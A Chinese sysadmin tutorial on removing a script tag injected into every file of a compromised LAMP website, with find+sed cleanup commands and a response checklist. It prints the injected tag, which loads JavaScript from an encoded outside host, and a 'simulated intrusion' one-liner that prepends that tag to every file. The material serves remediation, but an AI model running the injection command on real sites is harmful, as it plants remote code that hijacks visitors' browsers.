解决web网站被挂马清除方法
案例:某公司一个lamp的服务器网站站点目录下所有文件均被植入了广告脚本如下内容:
<script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad>
</script>\’
包括图片文件也为植入了,网站打开时就会调用这个地址,显示一个广告,造成的用户体验很恶劣,那么如何快速处理呢。
解决方法:思路是:需要查看所有目录所有文件,把以上被植入的内容删除掉。
测试数据如下:
入侵模拟植入命令:
find ./ -type f|xargs sed -i \’1 i <script language=javascript
src=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad></script>\’
解决方法:
1、 正则方法:
find ./ -type f -exec sed -i \’/^.*google_ad.*$/d\’ {} \;
注意:本方法容易把程序了i的其他正常内容给删掉了,匹配关键字很重要,因此不建议使用此方法。
2、 完整去除,摆脱正则匹配的麻烦:
find ./ -type f|xargs sed -i \’/<script language=javascript src=htt
p:\/\/%4%66E%78%72%67%2E%70%6F\/x.js?google_ad=93x28_ad><\/script>/d\’
find ./ -type f|xargs sed -i \’s#<script language=javascript src=ht
tp://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad></script>##g\’
从发现问题到解决流程:
1、 运营人员、网站用户发现问题,网站有弹窗广告。
2、 运营人员报给开发人员,开发人员联系运维人员,开发和运维共同解决。
3、 开发发现的问题原因就是所有站点目录被植入一段js代码。
4、 运维人员解决问题:a.备份原始出问题的原始文件。b.历史备份覆盖。c.find+sed替换。
5、 详细查看日志,查找问题发生来源并修补漏洞。